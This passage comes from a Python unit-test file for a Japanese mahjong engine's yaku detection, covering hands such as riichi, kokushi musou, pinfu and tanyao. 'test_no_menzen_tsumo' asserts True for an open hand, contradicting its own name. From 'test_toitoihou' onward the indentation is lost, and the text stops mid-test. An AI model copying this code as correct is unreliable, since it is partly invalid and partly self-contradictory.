    def test_no_menzen_tsumo(self):  # 門前清自摸和
        for i in range(2, 8):
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
        naki_tile = Tile(Suit.SOUZU.value, 2)
        naki_tile.owner = 3
        self.player.kabe.append(
            Huro(Naki.CHII, naki_tile,
                 [Tile(Suit.SOUZU.value, i) for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        ron = False
        yaku_types = JouKyouYaku(
            self.player, self.stack, machi_tiles, self.bakaze, ron)

        self.assertEqual(yaku_types.menzen_tsumo(), True)
        self.assertEqual(yaku_types.total_yaku, ['menzen_tsumo'])
        self.assertEqual(yaku_types.total_han, [1])

    def test_menzen_tsumo(self):  # 門前清自摸和
        for i in range(2, 8):
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        ron = False
        yaku_types = JouKyouYaku(
            self.player, self.stack, machi_tiles, self.bakaze, ron)

        self.assertEqual(yaku_types.menzen_tsumo(), True)
        self.assertEqual(yaku_types.total_yaku, ['menzen_tsumo'])
        self.assertEqual(yaku_types.total_han, [1])

    def test_chankan(self):  # 搶槓
        ...

    def test_no_houtei_raoyui(self):  # 河底撈魚
        for i in range(2, 8):
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        ron = True
        for i in range(121):
            _ = self.stack.draw()
        yaku_types = JouKyouYaku(
            self.player, self.stack, machi_tiles, self.bakaze, ron)

        self.assertEqual(yaku_types.houtei_raoyui(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_houtei_raoyui(self):  # 河底撈魚
        for i in range(2, 8):
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        ron = True
        for i in range(122):
            _ = self.stack.draw()
        yaku_types = JouKyouYaku(
            self.player, self.stack, machi_tiles, self.bakaze, ron)

        self.assertEqual(yaku_types.houtei_raoyui(), True)
        self.assertEqual(yaku_types.total_yaku, ['houtei_raoyui'])
        self.assertEqual(yaku_types.total_han, [1])

    def test_no_riichi(self):  # 立直
        for i in range(2, 8):
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        self.player.is_riichi = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = JouKyouYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.riichi(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_riichi(self):  # 立直
        for i in range(2, 8):
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        self.player.is_riichi = True
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = JouKyouYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.riichi(), True)
        self.assertEqual(yaku_types.total_yaku, ['riichi'])
        self.assertEqual(yaku_types.total_han, [1])

    def test_ippatsu(self):  # 一発
        ...

    def test_no_haitei_raoyue(self):  # 海底撈月
        for i in range(2, 8):
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        ron = True
        for i in range(122):
            _ = self.stack.draw()
        yaku_types = JouKyouYaku(
            self.player, self.stack, machi_tiles, self.bakaze, ron)

        self.assertEqual(yaku_types.haitei_raoyue(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_haitei_raoyue(self):  # 海底撈月
        for i in range(2, 8):
            self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        ron = False
        for i in range(122):
            _ = self.stack.draw()
        yaku_types = JouKyouYaku(
            self.player, self.stack, machi_tiles, self.bakaze, ron)

        self.assertEqual(yaku_types.haitei_raoyue(), True)
        self.assertEqual(yaku_types.total_yaku, ['haitei_raoyue'])
        self.assertEqual(yaku_types.total_han, [1])

    def test_rinshan_kaihou(self):  # 嶺上開花
        ...

    def test_daburu_riichi(self):  # 両立直
        ...

    def test_tenhou(self):  # 天和
        ...

    def test_chiihou(self):  # 地和
        ...
class TestTeYaku(unittest.TestCase):

    def setUp(self):
        self.player = Player('test', 0)
        self.stack = Stack()
        self.bakaze = Jihai.TON

    def test_no_ryuuiisou(self):  # 緑一色
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
        self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
        naki_tile = Tile(Suit.JIHAI.value, Jihai.HATSU.value)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.PON, naki_tile,
                 [Tile(Suit.JIHAI.value, Jihai.HATSU.value)
                  for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.ryuuiisou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_ryuuiisou(self):  # 緑一色
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 2
        naki_tile = Tile(Suit.JIHAI.value, Jihai.HATSU.value)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.PON, naki_tile,
                 [Tile(Suit.JIHAI.value, Jihai.HATSU.value)
                  for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.ryuuiisou(), True)
        self.assertEqual(yaku_types.total_yaku, ['ryuuiisou'])
        self.assertEqual(yaku_types.total_han, [13])

    def test_no_kokushi_musou(self):  # 国士無双
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 2
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
        self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.kokushi_musou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_kokushi_musou(self):  # 国士無双 single wait
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
        self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.kokushi_musou(), True)
        self.assertEqual(yaku_types.total_yaku, ['kokushi musou'])
        self.assertEqual(yaku_types.total_han, [13])

    def test_kokushi_musou_13_way(self):  # 国士無双 13-way wait
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.PEI.value).index] += 1
        self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.kokushi_musou(), True)
        self.assertEqual(yaku_types.total_yaku, ['kokushi musou 13-way wait'])
        self.assertEqual(yaku_types.total_han, [26])

    def test_no_chuuren_poutou(self):  # 九蓮宝燈
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 0
        self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
        self.player.agari_tile = Tile(Suit.SOUZU.value, 2)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.chuuren_poutou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_chuuren_poutou(self):  # 九蓮宝燈
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 0
        self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 2
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
        self.player.agari_tile = Tile(Suit.SOUZU.value, 2)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.chuuren_poutou(), True)
        self.assertEqual(yaku_types.total_yaku, ['chuuren poutou'])
        self.assertEqual(yaku_types.total_han, [13])

    def test_junsei_chuuren_poutou(self):  # 純正九蓮宝燈
        self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.chuuren_poutou(), True)
        self.assertEqual(yaku_types.total_yaku, ['junsei chuuren poutou'])
        self.assertEqual(yaku_types.total_han, [26])

    def test_no_toitoihou(self):  # 対々和
        self.player.hand[Tile(Suit.PINZU.value, 8).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
        for tile_rank in range(2, 5):
            naki_tile = Tile(Suit.MANZU.value, tile_rank)
            naki_tile.owner = 2
            self.player.kabe.append(
                Huro(Naki.PON, naki_tile,
                     [Tile(Suit.MANZU.value, tile_rank)
                      for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.PINZU.value, 7)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.toitoihou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_no_toitoihou_2(self):  # 対々和
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
        for tile_rank in range(2, 4):
            naki_tile = Tile(Suit.MANZU.value, tile_rank)
            naki_tile.owner = 2
            self.player.kabe.append(
                Huro(Naki.PON, naki_tile,
                     [Tile(Suit.MANZU.value, tile_rank)
                      for i in range(1, 4)]))
        naki_tile = Tile(Suit.SOUZU.value, 1)
        naki_tile.owner = 3
        self.player.kabe.append(
            Huro(Naki.CHII, naki_tile,
                 [Tile(Suit.SOUZU.value, i) for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.HAKU.value)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = TeYaku(
            self.player, self.stack, machi_tiles, self.bakaze, True)

        self.assertEqual(yaku_types.toitoihou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_toitoihou(self):  # 対々和
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
for tile_rank in range(2, 5):
naki_tile = Tile(Suit.MANZU.value, tile_rank)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.MANZU.value, tile_rank) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.HAKU.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.toitoihou(), True)
self.assertEqual(yaku_types.total_yaku, ['toitoihou'])
self.assertEqual(yaku_types.total_han, [2])
def test_no_chiitoitsu(self): # 七対子
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
for tile_rank in range(2, 5):
naki_tile = Tile(Suit.MANZU.value, tile_rank)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.MANZU.value, tile_rank) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.HAKU.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chiitoitsu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_chiitoitsu(self): # 七対子
self.player.hand[Tile(Suit.PINZU.value, 8).index] += 2
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 5).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chiitoitsu(), True)
self.assertEqual(yaku_types.total_yaku, ['chiitoitsu'])
self.assertEqual(yaku_types.total_han, [2])
def test_no_ikkitsuukan(self): # 一気通貫
for i in range(4, 10):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ikkitsuukan(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_ikkitsuukan_closed(self): # 一気通貫
for i in range(1, 10):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ikkitsuukan(), True)
self.assertEqual(yaku_types.total_yaku, ['ikkitsuukan'])
self.assertEqual(yaku_types.total_han, [2])
def test_ikkitsuukan_opened(self): # 一気通貫
# open hand (not menzenchin)
for i in range(4, 10):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
naki_tile = Tile(Suit.PINZU.value, 2)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.CHII, naki_tile,
[Tile(Suit.PINZU.value, i) for i in range(1, 4)]))
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ikkitsuukan(), True)
self.assertEqual(yaku_types.total_yaku, ['ikkitsuukan'])
self.assertEqual(yaku_types.total_han, [1])
def test_no_pinfu(self): # 平和
# waits on 3p / 6p / 9p
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 3).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 4).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 6).index] += 2
self.player.hand[Tile(Suit.PINZU.value, 7).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 8).index] += 1
self.player.agari_tile = Tile(Suit.PINZU.value, 3)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.pinfu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_no_pinfu_middle_wait(self): # 平和
# kanchan (closed) wait
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 2).index] += 2
self.player.hand[Tile(Suit.PINZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 6).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 7).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 8)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.pinfu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_pinfu(self): # 平和
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 5).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 6).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 7).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 9)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.pinfu(), True)
self.assertEqual(yaku_types.total_yaku, ['pinfu'])
self.assertEqual(yaku_types.total_han, [1])
def test_no_tanyao_closed(self): # 断么九
for i in range(1, 7):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tanyao(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_no_tanyao_opened(self): # 断么九
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
naki_tile = Tile(Suit.PINZU.value, 9)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.PINZU.value, 9) for i in range(1, 4)]))
self.player.menzenchin = False
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tanyao(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_tanyao_closed(self): # 断么九
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tanyao(), True)
self.assertEqual(yaku_types.total_yaku, ['tanyao'])
self.assertEqual(yaku_types.total_han, [1])
def test_tanyao_opened(self): # 断么九
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
naki_tile = Tile(Suit.PINZU.value, 2)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.PINZU.value, 2) for i in range(1, 4)]))
self.player.menzenchin = False
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tanyao(), True)
self.assertEqual(yaku_types.total_yaku, ['tanyao'])
self.assertEqual(yaku_types.total_han, [1])
class TestYakuhai(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_daisangen(self): # 大三元
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.daisangen(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_daisangen(self): # 大三元
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
